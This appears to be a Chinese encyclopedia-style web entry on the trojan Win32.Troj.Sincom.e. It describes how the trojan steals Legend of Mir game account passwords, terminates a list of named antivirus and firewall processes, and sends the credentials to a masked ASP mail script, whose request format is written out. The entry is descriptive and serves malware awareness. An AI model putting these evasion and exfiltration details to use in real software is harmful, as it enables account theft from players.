Win32.Troj.Sincom.e简介_Win32.Troj.Sincom.e个人资料_Win32.Troj.Sincom.e微博_百科网
A-A+

Win32.Troj.Sincom.e简介_Win32.Troj.Sincom.e个人资料_Win32.Troj.Sincom.e微博

2018-04-16 06:04:17 科学百科 阅读 1 次

概要/Win32.Troj.Sincom.e 编辑

病毒别名:TrojanSpy.Win32.Sincom.e【AVP】
处理时间:
威胁级别:★★
中文名称:
病毒类型:木马
影响系统:Win9x / WinNT
病毒行为:
该病毒运行后会窃取用户的传奇账号密码,并把这些信息,发送给木马种植者,导致感染机器用户在传奇游戏中的角色被他人控制。该病毒还会关闭常见的杀毒软件,以防止自己被杀毒软件清除。


1、关闭以下进程,以防止被查杀
kvapfw.exe
kvfw.exe
DFVSNET.EXE.
PasswordGuard.exe
EGhost.exe
Iparmor.exe
pfw.exe

2、病毒发现传奇帐号密码后,会按以下格式发送到指定的ASP脚本,ASP脚本再转发邮件
www.5×××9.com///cqtstsqj/mmmm/sendmail.asp?tomail=××××&;mailSubject=注册版&FromName=×××&frommail=×××&Priority=3&Submit=%B7%A2+%CB%CD&&action=send&mailbody=区号:×××用户名:×××服务器:×××对方ip地址:×××对方发信时间:×××密码×××

 

相关条目/Win32.Troj.Sincom.e 编辑

计算机 木马 病毒 网络 软件 系统